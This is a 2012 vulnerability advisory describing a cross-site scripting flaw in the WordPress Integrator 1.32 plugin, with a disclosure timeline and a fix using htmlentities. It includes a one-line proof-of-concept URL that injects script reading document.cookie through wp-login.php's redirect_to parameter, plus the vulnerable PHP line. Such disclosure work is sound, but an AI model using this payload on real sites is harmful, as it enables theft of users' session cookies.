Advisory: WordPress plugin 'WordPress Integrator 1.32' XSS vulnerability Advisory ID: SSCHADV2012-010 Author: Stefan Schurtz Affected Software: Successfully tested on WordPress Integrator 1.32 Vendor URL: http://wordpress.org/extend/plugins/wp-integrator/ Vendor Status: informed OSVDB ID: 80628 ========================== Vulnerability Description ========================== The WordPress plugin 'WordPress Integrator 1.32' is prone to Cross-Site scripting vulnerability ================== PoC-Exploit ================== http://[target]/wordpress/wp-login.php?redirect_to=http://%3F1alert(document.cookie)&reauth=1 // vulnerable code in wp-integrator.php function init_handler() { $url = parse_url($_SERVER["REQUEST_URI"]); ========= Solution ========= function init_handler() { $url = parse_url(htmlentities($_SERVER["REQUEST_URI"])); ==================== Disclosure Timeline ==================== 19-Mar-2012 - vendor informed 20-Mar-2012 - informed plugins@wordpress.org ======== Credits ======== Vulnerability found and advisory written by Stefan Schurtz. =========== References =========== http://www.darksecurity.de/advisories/2012/SSCHADV2012-010.txt http://osvdb.org/show/osvdb/80628